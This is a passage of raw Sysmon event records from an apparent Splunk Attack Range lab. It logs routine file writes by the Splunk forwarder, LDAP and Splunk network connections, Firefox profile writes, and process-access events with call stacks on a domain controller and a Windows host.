Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7CE78EDB3138D352982A95F097AE1B6,SHA256=EC342B2CD55B0B062FDF8140B60CA2044E033953890DDDBC5A1F27C9EB10115F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:15.065{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D2B456C2E7024052A08164A783D77C,SHA256=C902BF6EFC23D9E726CBFEE0AABA4B39EC70B749B624DFD890837C6552BA5D81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6B014ED0940D12E251C3B2E5AB5ED56,SHA256=BC0C0AE815C90B3E5DDBE7118A4C0C534E23D9DA5017381283B3B45CE2C910CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.380{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BDDC3F6BD66C30EE5927573F5C70117,SHA256=E68CA0B79A32927F5B7CD576BC7205E1D015333B649430FE06B129AE0E026FDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:16.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB25627026FAAF1DA6F4CD8C83F976A2,SHA256=E29FC647E16F0B523E1F5BB21E8A43560C9F746D54B394DC0C9985F69E9CBD6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:16.097{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6214174F927FCF32EE668243A487ABA5,SHA256=5B0509AEA0C154C74CB62F88B75653A129EA188470C04ABE43D926771EDD2222,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:07.913{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50951-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001046961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.913{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50951-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001046964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:17.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CDDFFD7B902C55B8D562AB08B651F3E,SHA256=738F261F853E356816BC88DBF6FF2E69D2904D970E48A5C7B6686AB8AFA332F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:16.245{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57199-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:17.144{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09F73D4ABAA91317EBA76888BD465AB1,SHA256=FF0F2EAB3A880C07406327F7CAA10F351D269ABA67F199EA0B39EBD3C66C64EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:18.810{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF761FD5FF0867752A700BF07F2FD2DD,SHA256=03C03B762BA9946D110833C723D130731C32824EA222B1A9C071A02FEDA2ABD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:18.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48CEFACA22796327A54B8CC005A13466,SHA256=394C2242DA9C3574ACB65B3AB6DFFD882634F5B0082ECE2064344CCE35A3A9E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:18.211{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:09.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50952-false10.0.1.12-8000- 23542300x80000000000000001046968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:19.825{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE41FC3094B9E1819113FD626E996BC5,SHA256=7DE2420F9D68D089AF4E2EA087363A7C7B7F7F5A55B5FD57951D0588CAC2F79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:19.237{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471179DC80BFC6722885B9F5B6330F96,SHA256=6173FD683872EAA22249FA94724E777F3856B86027C3F0785D502D09C47D0023,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7224F2408E317E34C3870899DFFF530,SHA256=C156FE6CB00E9461E026CE5A894D6632B3FB91C73ED18C1455A2575D6765F45A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:20.378{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:20.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6BA164BBA629EC773649940FA83568,SHA256=216AEEC8812CF497DC0FAB8BA301A7E2FF498001354C730A5C23EB50D83572B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.224{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.224{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.224{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:21.872{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74F66E35D1D3F9430272D4DE2835C5CF,SHA256=35702D8A790D216ED5DC7B92753D45517A03DF0CFA6C887BD4B07913DDF9ADA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:20.511{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57200-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000806622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:21.269{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A3B0B890B4BA499F9B63AE4543ED7F,SHA256=849B80F3D20A59654A2644B4B94FDFD3D37EF0764CA5F1BA09921D9061379F3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:22.890{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72FD164EB079DB3ACB0B1EB1DA014F89,SHA256=F4B77B527F311B4C091544873BCF3BB31B60080E33AA322774DCA1E1E9FFDDA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:22.506{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=BC5F78334C37347EC1CDF9BB5076AFA8,SHA256=E45C487185123555C47A476BC76CD90222DF7188429F9226623F61D66511D84C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:22.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA41B46129EA67A93F33776676966E8,SHA256=93771E4EAF9A8FC6B68C057A5EA07AF26511C47AE10146AD2C367834E02B7945,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:23.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA1FB1F07729273C97FB53453FF95C62,SHA256=7E21BF69CCD0856572B6C1B926054A469433A7BE6013E000F7DBCAD8F2B37281,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:21.370{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57201-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:23.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF17258E527E8F918C58DDE6D0C12E7,SHA256=B6BEAEF197CFD5D4D2B2AB839B298043259E99BB95D2179D6C29451A9CC1BC7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:24.920{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B15E16B312E83868849C7B56502EB477,SHA256=E2A8A256028C56AECB831D8B18174430B755CCD6ECDA5E31421A8C320BB152AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 